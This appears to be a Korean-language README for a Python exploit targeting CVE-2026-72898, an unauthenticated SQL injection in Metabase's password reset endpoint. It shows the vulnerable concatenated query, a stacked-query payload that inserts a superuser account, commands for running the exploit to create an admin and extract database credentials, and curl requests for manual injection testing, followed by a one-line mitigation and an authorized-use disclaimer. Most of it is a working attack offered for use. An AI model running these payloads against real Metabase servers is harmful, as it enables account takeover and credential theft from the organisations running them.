
CVE-2026-72898에 대한 Python 익스플로잇으로, Metabase의 비밀번호 재설정 엔드포인트에서 발생하는 인증되지 않은 SQL 인젝션을 이용해 관리자 계정을 생성하고 데이터베이스 자격 증명을 추출합니다.
SQL 쿼리의 문자열 연결:
# 취약한 코드
query = f"SELECT * FROM core_user WHERE email='{email}'"
공격 페이로드:
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --
검사만 (수정 없음):
python3 CVE-2026-72898.py http://localhost:5000 --check
전체 익스플로잇:
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!
수동 테스트:
# 엔드포인트 확인
curl http://localhost:5000/api/health
# SQLi 테스트
curl -X POST http://localhost:5000/api/session/reset_password \
-H "Content-Type: application/json" \
-d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'
즉시:
/api/session/reset_password 차단추후:
허가된 사용만 가능합니다. 무단 접근은 불법입니다.